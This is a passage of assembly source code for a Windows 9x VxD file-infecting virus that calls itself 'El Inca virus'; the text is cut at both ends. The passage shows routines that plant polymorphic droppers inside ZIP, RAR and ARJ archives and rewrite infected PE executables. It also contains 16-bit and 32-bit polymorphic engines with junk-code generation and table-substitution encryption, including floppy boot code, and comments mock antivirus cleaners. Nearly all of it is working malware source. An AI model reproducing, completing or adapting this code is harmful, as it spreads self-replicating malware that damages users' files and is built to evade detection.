|
|
cmp dword ptr [ZIPNoDisk], 0
|
|
jnz ExitFree
|
|
inc word ptr [ZIPEntryDisk]
|
|
inc word ptr [ZIPEntrysDir]
|
|
add dword ptr [ZIPSizeDir], ZIPRHeaderSize
|
|
mov eax, [ZIPOffsetDir]
|
|
mov [ZIPROffsetLHeaderR], eax
|
|
mov ebp, eax
|
|
mov ecx, [ZIPSizeDir]
|
|
call AllocMemory
|
|
jz ExitFree
|
|
mov [BufferTwoHandle], eax
|
|
mov esi, eax
|
|
mov eax, R0_READFILE
|
|
mov ecx, [ZIPSizeDir]
|
|
mov edx, ebp
|
|
VxDCall IFSMgr_Ring0_FileIO ;read tonz of headers and
|
|
jc ExitDealloc ;write they back after
|
|
cld ;modificationz
|
|
mov ecx, ZIPRHeaderSize ;(ZIP really sux)
|
|
mov edi, [BufferTwoHandle]
|
|
add edi, [ZIPSizeDir]
|
|
sub edi, ecx
|
|
mov esi, offset32 ZIPRHeaderId
|
|
rep movsb
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, offset32 ZIPReadBuffer-offset32 ZIPLHeaderId
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
mov esi, offset32 ZIPLHeaderId
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitDealloc
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
mov [ZIPOffsetDir], ebp
|
|
mov esi, [BufferOneHandle]
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitDealloc
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, [ZIPSizeDir]
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
mov esi, [BufferTwoHandle]
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitDealloc
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, ZIPEHeaderSize
|
|
mov edx, ebp
|
|
mov esi, offset32 ZIPReadBuffer
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
ExitDealloc:
|
|
mov eax, [BufferTwoHandle]
|
|
call DeallocMemory
|
|
jmp ExitRO
|
|
|
|
InfectRAR:
|
|
bt [FileAttr], 0
|
|
jc ExitUnmark ;bahh... the same shit, but
|
|
call PreparateDropper ;this time for RAR
|
|
mov [RARFileCRC], eax
|
|
mov edi, offset32 RARFileName
|
|
call Random4Name
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov [RARCompressedSize], ecx
|
|
mov [RARUncompressedSize], ecx
|
|
mov eax, R0_READFILE
|
|
mov ecx, 4
|
|
xor edx, edx
|
|
mov esi, offset32 Pad
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitFree
|
|
cmp [esi], '!raR'
|
|
jne ExitFree
|
|
mov esi, offset32 RARHeaderType
|
|
mov edi, offset32 RARHeaderEnd-offset32 RARHeaderType
|
|
call CRC32
|
|
mov [RARHeaderCRC], cx
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, offset32 RARHeaderEnd-offset32 RARHeaderCRC
|
|
mov esi, offset32 RARHeaderCRC
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov edx, ebp
|
|
mov esi, [BufferOneHandle]
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jmp ExitRO
|
|
|
|
InfectARJ:
|
|
bt [FileAttr], 0
|
|
jc ExitUnmark
|
|
call PreparateDropper ;uhh... again for ARJ
|
|
sub ebp, 4
|
|
mov [ARJFileCRC], eax ;(i only do this because there
|
|
mov edi, offset32 ARJFilename ;stupid peoples that run new
|
|
call Random4Name ;strange filez)
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov [ARJCompressedSize], ecx
|
|
mov [ARJUncompressedSize], ecx
|
|
mov eax, R0_READFILE
|
|
mov ecx, 2
|
|
xor edx, edx
|
|
mov esi, offset32 Pad
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitFree
|
|
cmp word ptr [esi], 0ea60h
|
|
jne ExitFree
|
|
mov edi, offset32 ARJHeaderCRC-offset32 ARJ1HeaderSize
|
|
mov esi, offset32 ARJ1HeaderSize
|
|
call CRC32
|
|
mov [ARJHeaderCRC], eax
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, offset32 ARJEnd-offset32 ARJHeaderId
|
|
mov esi, offset32 ARJHeaderId
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitFree
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, [PolyDOSFileSize]
|
|
mov edx, ebp
|
|
add ebp, ecx
|
|
mov esi, [BufferOneHandle]
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitFree
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, 4
|
|
mov edx, ebp
|
|
mov esi, offset32 ARJEnd
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
|
|
ExitRO:
|
|
or [FileAttr], 01b ;set inf marker(avoid lame
|
|
ExitFree: ;AVs like TBCLEAN, that cant
|
|
mov eax, [BufferOneHandle] ;clean r-o file)
|
|
call DeAllocMemory
|
|
ExitClose:
|
|
mov eax, R0_CLOSEFILE
|
|
mov ebx, [FileHandle]
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
ExitUnmark:
|
|
mov eax, R0_FILEATTRIBUTES+SET_ATTRIBUTES
|
|
mov ecx, [FileAttr]
|
|
mov esi, offset32 FileName
|
|
VxDCall IFSMgr_Ring0_FileIO ;restore attribz
|
|
popad
|
|
|
|
ExitCorrect:
|
|
mov [OurFile], 0
|
|
ExitNow:
|
|
mov eax, [ebp+28]
|
|
push eax
|
|
mov eax, [ebp+24]
|
|
push eax
|
|
mov eax, [ebp+20]
|
|
push eax
|
|
mov eax, [ebp+16]
|
|
push eax
|
|
mov eax, [ebp+12]
|
|
push eax
|
|
mov eax, [ebp+8]
|
|
push eax
|
|
mov eax, [nexthook]
|
|
call [eax] ;continue next caller
|
|
add esp, 20h
|
|
leave
|
|
ret
|
|
EndProc FONO98_File_System
|
|
|
|
|
|
db 13d, 'El Inca virus', 13d ;yeahh... this is the name
|
|
|
|
|
|
BeginProc PreparateDropper
|
|
mov eax, R0_OPENCREATFILE
|
|
mov ebx, 2
|
|
xor cx, cx ;used for archivers infection
|
|
mov edx, 11h
|
|
mov esi, offset32 FileName
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov [FileHandle], eax ;here we get the size of file
|
|
mov ebx, eax ;copy some shitz and calculate
|
|
jc ExitUnmark ;crc16 and crc32
|
|
mov eax, R0_GETFILESIZE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc ExitClose
|
|
mov ebp, eax
|
|
cld
|
|
mov ecx, [PolyDOSFileSize]
|
|
call AllocMemory ;alloc memory for loader
|
|
jz ExitClose ;and vxd
|
|
mov [BufferOneHandle], eax
|
|
mov edi, eax
|
|
mov esi, [PolyDOSFileBuffer]
|
|
mov ecx, [PolyDOSFileSize]
|
|
push ecx
|
|
rep movsb ;zopi loader
|
|
pop ecx
|
|
push ecx
|
|
mov esi, [BufferOneHandle]
|
|
push esi
|
|
call CRC16
|
|
mov [LHACRC16], ax ;only LHZ use crc16
|
|
pop esi
|
|
pop edi
|
|
call CRC32 ;crc32 returned in eax for
|
|
ret ;otherz
|
|
EndProc PreparateDropper
|
|
|
|
|
|
|
|
BeginProc VxDMapFile
|
|
mov eax, R0_OPENCREATFILE ;hey... i also have a map
|
|
mov ebx, 2 ;file function... ;)
|
|
xor ecx, ecx
|
|
mov [VMF_sucess], ecx
|
|
mov edx, 11h
|
|
mov esi, offset32 FileName
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov [VMF_handle], eax
|
|
jc VMF_ret
|
|
mov ebx, eax
|
|
mov eax, R0_GETFILESIZE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
mov [VMF_size], eax
|
|
jc VMF_close
|
|
push eax
|
|
mov ecx, eax
|
|
add ecx, ebp ;alloc enought memory for
|
|
call AllocMemory ;file and workspace
|
|
mov [VMF_base], eax
|
|
mov esi, eax
|
|
pop ecx
|
|
jz VMF_close
|
|
mov eax, R0_READFILE
|
|
xor edx, edx ;map it out!
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
jc VMF_free
|
|
VMF_ret:
|
|
ret
|
|
EndProc VxDMapFile
|
|
|
|
|
|
|
|
BeginProc VxDUnMapFile
|
|
mov ecx, 12345678h
|
|
VMF_sucess equ dword ptr $-4
|
|
jecxz VMF_close ;should we update it?
|
|
mov eax, R0_WRITEFILE
|
|
mov ecx, [VMF_size]
|
|
sub edx, edx
|
|
mov ebx, [VMF_handle]
|
|
mov esi, [VMF_base] ;write infected PE
|
|
VxDCall IFSMgr_Ring0_FileIO
|
|
VMF_close:
|
|
mov eax, R0_CLOSEFILE
|
|
VxDCall IFSMgr_Ring0_FileIO ;close it
|
|
VMF_free:
|
|
mov eax, [VMF_base]
|
|
call DeAllocMemory ;free allocated memory
|
|
ret
|
|
EndProc VxDUnMapFile
|
|
|
|
|
|
|
|
BeginProc AllocMemory
|
|
push ecx
|
|
push HEAPSWAP+HEAPZEROINIT
|
|
push ecx
|
|
VMMCall _HeapAllocate ;memory allocation routine
|
|
add sp, 8
|
|
or eax, eax
|
|
pop ecx
|
|
ret
|
|
EndProc AllocMemory
|
|
|
|
|
|
|
|
BeginProc DeAllocMemory
|
|
push 0
|
|
push eax
|
|
VMMCall _HeapFree
|
|
add sp, 8
|
|
ret
|
|
EndProc DeAllocMemory
|
|
|
|
|
|
|
|
BeginProc CRC32
|
|
cld
|
|
push ebx
|
|
mov ecx, -1 ;look at this!!!!
|
|
mov edx, ecx
|
|
NextByteCRC:
|
|
xor eax, eax ;our crc32 dont need huge
|
|
xor ebx, ebx ;tables or shit like...
|
|
lodsb
|
|
xor al, cl ;all calculated at runtime
|
|
mov cl, ch
|
|
mov ch, dl
|
|
mov dl, dh
|
|
mov dh, 8
|
|
NextBitCRC:
|
|
shr bx, 1
|
|
rcr ax, 1
|
|
jnc NoCRC
|
|
xor ax, 08320h
|
|
xor bx, 0edb8h
|
|
NoCRC:
|
|
dec dh
|
|
jnz NextBitCRC
|
|
xor ecx, eax
|
|
xor edx, ebx
|
|
dec di
|
|
jnz NextByteCRC
|
|
not edx
|
|
not ecx
|
|
pop ebx
|
|
mov eax, edx
|
|
rol eax, 16
|
|
mov ax, cx ;thx2zenghxi
|
|
ret
|
|
EndProc CRC32
|
|
|
|
VIRSIZE equ 4000H
|
|
|
|
gldr:
|
|
cld ;our 16bit poly engine
|
|
mov [pDOSBase], esi ;designed for boot and dropperz
|
|
mov edi, offset32 rgtbl
|
|
sub edx, edx
|
|
mov ebx, edx
|
|
push edi
|
|
mov eax, edx
|
|
mov dword ptr [edi-4], eax
|
|
mov ecx, 8
|
|
rep stosw ;init regz mirrors
|
|
pop edi
|
|
xchg esi, edi
|
|
mov byte ptr [opcode1], 0b8h
|
|
mov byte ptr [opcode2], 89h
|
|
mov word ptr [_sp], -1
|
|
mov byte ptr [gtype], gfl
|
|
@a1:
|
|
mov ecx, 8
|
|
call creg
|
|
call gopc
|
|
push edi
|
|
mov edi, esi
|
|
sub eax, eax
|
|
repnz scasw ;all regz initialized?
|
|
pop edi
|
|
jz @a1
|
|
call rnd
|
|
and eax, 011111b
|
|
adc eax, 8
|
|
mov ecx, eax
|
|
@a2:
|
|
call garble ;create some junk
|
|
loop @a2
|
|
cmp byte ptr [maq], 0
|
|
jne maqfile
|
|
mov eax, 00000202h ;floppy paramz
|
|
mov ebx, 0001000fh ;hi=reg
|
|
mov edx, 00020100h ;lo=value
|
|
mov ebp, 00037e00h
|
|
call mxrg ;mix order
|
|
mov byte ptr [gtype], gnf
|
|
push eax
|
|
push ebx
|
|
push edx
|
|
push ebp
|
|
mov ecx, 4
|
|
@a8:
|
|
xor eax, eax
|
|
mov edx, eax
|
|
pop ax
|
|
pop dx
|
|
bts word ptr [rgusg], dx
|
|
call mrval
|
|
push ecx
|
|
call rnd
|
|
and eax, 0111b
|
|
inc eax
|
|
mov ecx, eax
|
|
@a9:
|
|
call garble ;garble a bit more
|
|
loop @a9
|
|
pop ecx
|
|
loop @a8
|
|
mov ax, 013cdh ;int 13
|
|
stosw
|
|
mov byte ptr [gtype], gfl
|
|
mov word ptr [rgusg], 1000b
|
|
call mgarble
|
|
mov al, 06 ;push es
|
|
stosb
|
|
call mgarble
|
|
mov al, 53h ;push bx
|
|
stosb
|
|
call mgarble
|
|
mov al, 0cbh ;retf
|
|
stosb
|
|
ret
|
|
|
|
mgarble:
|
|
push ecx
|
|
call rnd
|
|
and eax, 0111b
|
|
inc eax
|
|
mov ecx, eax ;1-8 garbage calls
|
|
@b9:
|
|
call garble
|
|
loop @b9
|
|
pop ecx
|
|
ret
|
|
|
|
maqfile:
|
|
mov byte ptr [gtype], gnf
|
|
@c0:
|
|
call rnd
|
|
or al, al
|
|
jz @c0
|
|
mov byte ptr [key], al
|
|
call creg
|
|
mov byte ptr [cntreg], dl
|
|
bts word ptr [rgusg], dx
|
|
call rnd
|
|
and eax, 0111111111111b
|
|
add ax, word ptr [esi+edx*2]
|
|
add ax, VIRSIZE
|
|
mov word ptr [cntregv], ax
|
|
@c1:
|
|
call rnd
|
|
and eax, 011b
|
|
add al, al
|
|
add eax, offset32 crtbl
|
|
mov ax, word ptr [eax]
|
|
movzx edx, ah
|
|
bts word ptr [rgusg], dx
|
|
jc @c1
|
|
mov byte ptr [pntreg], dl
|
|
mov byte ptr [encintr], al
|
|
mov ax, word ptr [esi+edx*2]
|
|
mov word ptr [pntregv], ax
|
|
mov dword ptr [strloop], edi
|
|
call mgarble
|
|
mov al, 80h
|
|
mov ah, byte ptr [encintr]
|
|
stosw
|
|
push edi
|
|
stosw
|
|
mov al, byte ptr [key]
|
|
stosb
|
|
call mgarble
|
|
mov al, 040h
|
|
or al, byte ptr [pntreg]
|
|
stosb
|
|
call mgarble
|
|
mov al, 040h
|
|
or al, byte ptr [cntreg] ;inc counter
|
|
stosb
|
|
call mgarble
|
|
mov ax, 0f881h
|
|
or ah, byte ptr [cntreg]
|
|
stosw
|
|
mov ax, word ptr [cntregv]
|
|
stosw
|
|
mov ax, 0074h
|
|
stosw
|
|
push edi
|
|
call mgarble
|
|
mov al, 0e9h
|
|
stosb
|
|
mov eax, edi
|
|
sub eax, dword ptr [strloop]
|
|
add eax, 2
|
|
neg eax
|
|
stosw
|
|
call mgarble
|
|
pop ebp
|
|
mov ecx, edi
|
|
sub ecx, ebp
|
|
mov byte ptr [ebp-1], cl
|
|
call mgarble
|
|
call mgarble
|
|
mov word ptr [rgusg], 0
|
|
pop ebp
|
|
|
|
mov ecx, edi
|
|
sub ecx, [pDOSBase]
|
|
add ecx, 100h
|
|
|
|
movzx eax, word ptr [pntregv]
|
|
sub ecx, eax
|
|
mov word ptr [ebp], cx
|
|
ret
|
|
|
|
mxrg:
|
|
push eax
|
|
call rnd
|
|
and eax, 0111b
|
|
inc eax
|
|
mov ecx, eax
|
|
pop eax
|
|
@c3:
|
|
call rndf
|
|
jc @c4
|
|
xchg eax, ebx ;randomize order
|
|
@c4:
|
|
call rndf
|
|
jc @c5
|
|
xchg ebx, edx
|
|
@c5:
|
|
call rndf
|
|
jc @c6
|
|
xchg edx, ebp
|
|
@c6:
|
|
call rndf
|
|
jc @c7
|
|
xchg ebp, eax
|
|
@c7:
|
|
loop @c3
|
|
ret
|
|
|
|
garble:
|
|
cmp [maq], 0
|
|
je artm
|
|
call rnd
|
|
and eax, 0111b
|
|
cmp eax, 0111b
|
|
jne artm
|
|
push ecx ;make a jump
|
|
call rnd
|
|
and eax, 0111b
|
|
add eax, 4
|
|
mov ecx, eax
|
|
mov ah, 0ebh
|
|
xchg al, ah
|
|
stosw
|
|
ngrb:
|
|
call rnd
|
|
stosb
|
|
loop ngrb
|
|
pop ecx
|
|
ret
|
|
artm:
|
|
mov ebx, offset32 optbl
|
|
@d1:
|
|
call rnd
|
|
and eax, 0111b
|
|
gtype equ byte ptr $-1
|
|
gfl = 0111b
|
|
gnf = 0011b
|
|
cmp al, 5
|
|
ja @d1
|
|
add al, al
|
|
mov ax, word ptr [ebx+eax] ;make aritm
|
|
mov byte ptr [opcode1], ah
|
|
mov byte ptr [opcode2], al
|
|
call creg
|
|
call gopc
|
|
ret
|
|
|
|
creg:
|
|
call rnd
|
|
and eax, 0111b
|
|
cmp al, 4
|
|
jne @e1
|
|
inc al
|
|
@e1:
|
|
mov dl, al
|
|
bt word ptr [rgusg], dx ;used
|
|
jc creg
|
|
ret
|
|
|
|
gopc:
|
|
mov bl, 12h
|
|
opcode1 equ byte ptr $-1
|
|
mov al, 81h
|
|
cmp bl, 0c0h
|
|
jb @f1
|
|
stosb
|
|
@f1:
|
|
mov al, bl
|
|
or al, dl
|
|
stosb
|
|
call rnd
|
|
stosw
|
|
mov bx, ax
|
|
mov ax, word ptr [flags]
|
|
sahf ;look this!
|
|
opcode2 equ byte ptr $+1 ;the decriptor depends
|
|
mov word ptr [esi+edx*2], bx ;of the garbage code!
|
|
lahf ;we keep track of all, regs
|
|
mov word ptr [flags], ax ;and flags!!!! :)
|
|
ret
|
|
|
|
mrval:
|
|
push eax
|
|
call rnd
|
|
and eax, 011b ;ask a value... we make it
|
|
or eax, eax ;(in the requested reg) using
|
|
jz @g1 ;math and the current garbage
|
|
dec eax ;status! no more fixed movs :)
|
|
@g1:
|
|
add al, al
|
|
movzx eax, word ptr [offset32 fxtbl+eax]
|
|
or al, dl
|
|
xchg al, ah
|
|
mov byte ptr [opcode3], al
|
|
mov al, 81h
|
|
stosw
|
|
cmp byte ptr [opcode3], 3 ;(as you noticed, i'm very
|
|
pop eax ;proud of this engine)
|
|
jnz @g2
|
|
neg eax
|
|
@g2:
|
|
movzx ebx, word ptr [esi+edx*2]
|
|
jmp @g3
|
|
@g3:
|
|
xor eax, ebx
|
|
opcode3 equ byte ptr $-2 ;xor/add/sub
|
|
stosw
|
|
ret
|
|
|
|
rnd:
|
|
push ecx
|
|
push edx
|
|
mov eax, 12345678h ;congruential something... :)
|
|
seed equ dword ptr $-4
|
|
mov ecx, eax
|
|
imul eax, 41c64e6dh
|
|
add eax, 3039h ;thankz to GriYo...
|
|
ror ax, 1 ;(do you not imagine how hard
|
|
mov dword ptr [seed], eax ;is code a decent rnd routine)
|
|
xor eax, ecx
|
|
pop edx
|
|
pop ecx
|
|
ret
|
|
|
|
rndf:
|
|
push eax
|
|
call rnd
|
|
pop eax
|
|
bt eax, 1 ;random z flag
|
|
ret
|
|
|
|
pDOSBase dd 0
|
|
maq db 0
|
|
key db 0
|
|
strloop dd 0
|
|
cntregv dw 0
|
|
cntreg db 0
|
|
pntregv dw 0
|
|
pntreg db 0
|
|
encintr db 0
|
|
|
|
optbl dw 0b889h, 0f031h, 0c001h, 0e829h, 0d011h, 0d819h
|
|
; MOV XOR ADD SUB ADC SBB
|
|
fxtbl dw 033f0h, 02bc0h, 003e8h
|
|
; XOR ADD SUB
|
|
crtbl dw 03b7h, 05b6h, 06b4h, 07b5h
|
|
|
|
flags dw 0
|
|
rgusg dw 0
|
|
|
|
rgtbl equ this byte
|
|
_ax dw 0
|
|
_cx dw 0
|
|
_dx dw 0
|
|
_bx dw 0
|
|
_sp dw 0
|
|
_bp dw 0
|
|
_si dw 0
|
|
_di dw 0
|
|
|
|
PolyDOSSize equ $ - offset32 gldr
|
|
|
|
|
|
peng:
|
|
push edi ;our 32bit poly engine
|
|
push edi
|
|
mov [totsize], ecx
|
|
cld
|
|
mov edi, offset32 crptbl
|
|
mov ecx, 101h
|
|
sub edx, edx
|
|
tlp:
|
|
mov byte ptr [edi+edx], dl
|
|
inc edx
|
|
loop tlp ;make linear table of values
|
|
mov edi, offset32 crptbl
|
|
mov ecx, 01111b
|
|
tlp2:
|
|
call rnd255 ;randomize table
|
|
mov ebx, eax
|
|
call rnd255
|
|
mov dl, byte ptr [edi+ebx]
|
|
xchg dl, byte ptr [edi+eax] ;keep exchanging some bytes
|
|
mov byte ptr [edi+ebx], dl
|
|
loop tlp2
|
|
pop edi
|
|
mov [reg32], 00010000b ;set esp as used
|
|
call garble32
|
|
mov [reg32], 00110000b ;set esp/ebp as used
|
|
call get8reg
|
|
mov [tmp], eax
|
|
call get32_16reg
|
|
mov [tpointer], eax
|
|
call get32_16reg
|
|
mov [dpointer], eax
|
|
call get32_16reg
|
|
mov [tmp2], eax
|
|
call get32_16reg
|
|
mov [counter], eax ;choose regs
|
|
call garble32
|
|
push offset32 mdecr ;return adress
|
|
mov ebp, offset32 mcounter
|
|
mov ebx, offset32 mpointer
|
|
mov edx, offset32 mdpointer
|
|
call rnd
|
|
and eax, 0111b
|
|
inc eax
|
|
mov ecx, eax
|
|
mixer1:
|
|
call rndf
|
|
jc m11
|
|
xchg ebp, ebx
|
|
m11:
|
|
call rndf
|
|
jc m12
|
|
xchg edx, ebx
|
|
m12:
|
|
call rndf
|
|
jc m13
|
|
xchg edx, ebp
|
|
m13:
|
|
loop mixer1 ;randomize calling order
|
|
push ebp
|
|
push ebx
|
|
push edx
|
|
ret
|
|
mdecr:
|
|
mov [lstart], edi
|
|
call garble32
|
|
mov ax, 1011011000001111b
|
|
stosw ;movzx d tmp2, [reg1+reg2]
|
|
mov eax, [tmp2]
|
|
shl eax, 3
|
|
or al, 100b
|
|
stosb
|
|
mov eax, [tpointer]
|
|
shl eax, 3
|
|
or eax, [dpointer]
|
|
stosb
|
|
push eax
|
|
call garble32
|
|
mov al, 10001010b
|
|
stosb ;mov b tmp, [reg1+tmp2]
|
|
mov eax, [tmp]
|
|
shl eax, 3
|
|
or al, 100b
|
|
stosb
|
|
push eax
|
|
mov eax, [tpointer]
|
|
shl eax, 3
|
|
mov ebx, [tmp2]
|
|
or eax, ebx
|
|
stosb
|
|
mov al, 10001000b
|
|
stosb ;mov b [reg1+reg2], tmp
|
|
pop eax
|
|
stosb
|
|
pop eax
|
|
stosb
|
|
call garble32
|
|
push offset32 mcontinue
|
|
mov ebx, offset32 inc_pointer
|
|
mov edx, offset32 dec_counter
|
|
call rndf
|
|
jc m2
|
|
xchg edx, ebx ;randomize order
|
|
m2:
|
|
push ebx
|
|
push edx
|
|
ret
|
|
mcontinue:
|
|
call garble32
|
|
mov al, 0bh
|
|
stosb
|
|
mov eax, [counter]
|
|
shl eax, 3
|
|
or eax, [counter]
|
|
or al, 11000000b
|
|
stosb ;or reg, reg
|
|
mov eax, 850fh
|
|
stosw
|
|
mov eax, [lstart] ;386+ jne
|
|
sub eax, edi
|
|
sub eax, 4
|
|
stosd
|
|
mov [reg32], 00010000b ;set esp as used
|
|
call garble32
|
|
call garble32
|
|
mov ecx, edi
|
|
sub ecx, [tblstrt] ;calculate start of code
|
|
mov esi, [pmdptr] ;to decript(delta-based)
|
|
mov [esi], ecx
|
|
pop edx
|
|
mov ecx, edi
|
|
sub ecx, edx ;exit with correct regs
|
|
ret
|
|
|
|
inc_pointer:
|
|
mov eax, 40h ;inc
|
|
or eax, [dpointer]
|
|
stosb
|
|
call garble32
|
|
ret
|
|
|
|
dec_counter:
|
|
mov eax, 48h ;dec
|
|
or eax, [counter]
|
|
stosb
|
|
call garble32
|
|
ret
|
|
|
|
mcounter:
|
|
mov eax, 0b8h ;mov
|
|
or eax, [counter]
|
|
stosb
|
|
mov eax, [totsize]
|
|
stosd
|
|
call garble32
|
|
ret
|
|
|
|
mpointer:
|
|
mov al, 0e8h
|
|
stosb
|
|
mov ecx, 255+1
|
|
mov eax, ecx
|
|
stosd ;do call
|
|
mov [tblstrt], edi
|
|
mov esi, offset32 crptbl
|
|
rep movsb ;zopy table
|
|
mov eax, 58h ;do pop
|
|
or eax, [tpointer]
|
|
stosb
|
|
call garble32
|
|
ret
|
|
|
|
mdpointer:
|
|
mov eax, 0b8h ;mov
|
|
or eax, [dpointer]
|
|
stosb
|
|
mov [pmdptr], edi
|
|
stosd
|
|
call garble32
|
|
ret
|
|
|
|
gar:
|
|
call rnd ;get any reg
|
|
and eax, 0111b
|
|
cmp al, 4 ;sp never
|
|
je gar
|
|
ret
|
|
|
|
get32_16reg: ;get a free 32/16bit reg
|
|
call gar
|
|
bts [reg32], eax
|
|
jc get32_16reg
|
|
ret
|
|
|
|
get8reg: ;get a free 8bit reg
|
|
call rnd ;al,cl,dl,bl
|
|
and eax, 0011b
|
|
bts [reg32], eax
|
|
jc get8reg
|
|
call rndf
|
|
jc ntg
|
|
or al, 0100b ;ah,ch,dh,bh
|
|
ntg:
|
|
ret
|
|
|
|
garble32:
|
|
pushad
|
|
cmp byte ptr [rlevel], 3
|
|
je maxr
|
|
inc byte ptr [rlevel]
|
|
call rnd
|
|
and eax, 0111b
|
|
mov ecx, eax
|
|
inc ecx
|
|
ng32:
|
|
push ecx
|
|
call rnd
|
|
and eax, 01111b
|
|
shl eax, 2
|
|
add eax, offset32 gtbl
|
|
call dword ptr [eax]
|
|
pop ecx
|
|
loop ng32
|
|
dec byte ptr [rlevel]
|
|
maxr:
|
|
mov dword ptr [esp], edi ;change stack copy of edi
|
|
popad
|
|
ret
|
|
|
|
gtbl equ this byte
|
|
dd offset32 subr ;silly garblers :(
|
|
dd offset32 subr
|
|
dd offset32 jmps
|
|
dd offset32 jmps
|
|
dd offset32 jmps
|
|
dd offset32 jmps ;no time to code good ones...
|
|
dd offset32 jcc
|
|
dd offset32 jcc
|
|
dd offset32 jcc
|
|
dd offset32 jcc
|
|
dd offset32 calls
|
|
dd offset32 calls
|
|
dd offset32 calls
|
|
dd offset32 calls
|
|
dd offset32 calls
|
|
dd offset32 calls
|
|
|
|
jcc:
|
|
call rnd ;do jump conditional with
|
|
and eax, 0fh ;real displacement(no shitty
|
|
or eax, 0f80h ;$+2 thingie)
|
|
xchg al, ah
|
|
stosw
|
|
stosd
|
|
push edi
|
|
call garble32
|
|
pop esi
|
|
mov ecx, edi
|
|
sub ecx, esi
|
|
mov dword ptr [esi-4], ecx
|
|
ret
|
|
|
|
jmps:
|
|
mov al, 0e9h ;do jump
|
|
stosb
|
|
stosd
|
|
push edi
|
|
call rnd
|
|
and eax, 0111b
|
|
inc eax
|
|
mov ecx, eax
|
|
njnk:
|
|
call rnd ;fill with junk
|
|
stosb
|
|
loop njnk
|
|
pop esi
|
|
mov ecx, edi
|
|
sub ecx, esi
|
|
mov dword ptr [esi-4], ecx
|
|
ret
|
|
|
|
subr: ;make call to subroutine
|
|
cmp dword ptr [subad], 0
|
|
jz ncall ;a subroutine was coded?
|
|
mov al, 0e8h
|
|
stosb
|
|
mov eax, edi
|
|
sub eax, dword ptr [subad] ;calc subr address
|
|
add eax, 4
|
|
neg eax
|
|
stosd
|
|
ncall:
|
|
ret
|
|
|
|
calls:
|
|
cmp dword ptr [subad], 0 ;make subroutine
|
|
jne ncall
|
|
mov al, 0e9h ;the old thing...
|
|
stosb
|
|
stosd ;jump @@1
|
|
push edi ;@@2:
|
|
call garble32 ;*garbage*
|
|
mov al, 0c3h ;*garbage*
|
|
stosb ;ret
|
|
pop esi ;@@1:
|
|
mov ecx, edi
|
|
sub ecx, esi
|
|
mov dword ptr [esi-4], ecx
|
|
mov dword ptr [subad], esi ;store sub address
|
|
ret
|
|
|
|
rnd255:
|
|
call rnd
|
|
and eax, 011111111b
|
|
ret
|
|
|
|
encript_pe:
|
|
pushad
|
|
mov ecx, dword ptr [totsize] ;our poly engine isnt a
|
|
mov ebx, offset32 crptbl ;cyclical decriptor using
|
|
ecrt: ;xor/add/sub or like...
|
|
lodsb
|
|
push ecx ;we use a substitution scheme,
|
|
push edi ;based in a table... This way,
|
|
mov ecx, 100h ;'A'=='2' '#'=='x' and so...
|
|
mov edi, ebx ;no virus i know use this
|
|
repne scasb
|
|
dec edi
|
|
sub edi, ebx
|
|
mov eax, edi ;eax hold offset into table
|
|
pop edi
|
|
pop ecx
|
|
stosb
|
|
loop ecrt
|
|
mov [esp], edi ;setup edi copy in stack
|
|
popad
|
|
ret
|
|
|
|
subad dd 0
|
|
rlevel db 0
|
|
tmp dd 0
|
|
tmp2 dd 0
|
|
tpointer dd 0
|
|
dpointer dd 0
|
|
counter dd 0
|
|
pmdptr dd 0
|
|
tblstrt dd 0
|
|
lstart dd 0
|
|
reg32 dd 0
|
|
totsize dd 0
|
|
|
|
|
|
BeginProc CRC16
|
|
push ebx
|
|
push ecx
|
|
mov ebx, 0a001h
|
|
mov edi, offset32 CrcTab
|
|
xor edx, edx
|
|
crc16nb:
|
|
mov ax, dx
|
|
mov cx, 8
|
|
crc16l:
|
|
shr ax, 1
|
|
jae crc16sk
|
|
xor ax, bx
|
|
crc16sk:
|
|
loop crc16l
|
|
stosw ;make da table
|
|
inc edx
|
|
cmp edx, 512
|
|
jne crc16nb
|
|
pop ecx
|
|
xor eax, eax
|
|
CRC16Loop:
|
|
xor ebx, ebx
|
|
mov bl, al
|
|
lodsb
|
|
xor bl, al
|
|
shl bx, 1
|
|
mov bx, word ptr [CrcTab+bx] ;make CRC16 of it
|
|
xor bl, ah
|
|
mov eax, ebx
|
|
loop CRC16Loop
|
|
pop ebx
|
|
ret
|
|
EndProc CRC16
|
|
|
|
|
|
|
|
BeginProc Random4Name
|
|
mov dword ptr [edi], 'AAAA' ;setup base name
|
|
mov ecx, 4
|
|
in al, 40h
|
|
mov ah, al
|
|
NextLetter:
|
|
in al, 40h
|
|
xor al, ah
|
|
mov ah, al
|
|
and al, 01111b
|
|
add byte ptr [edi], al ;add random values to make
|
|
inc edi ;random letter, to obtain a
|
|
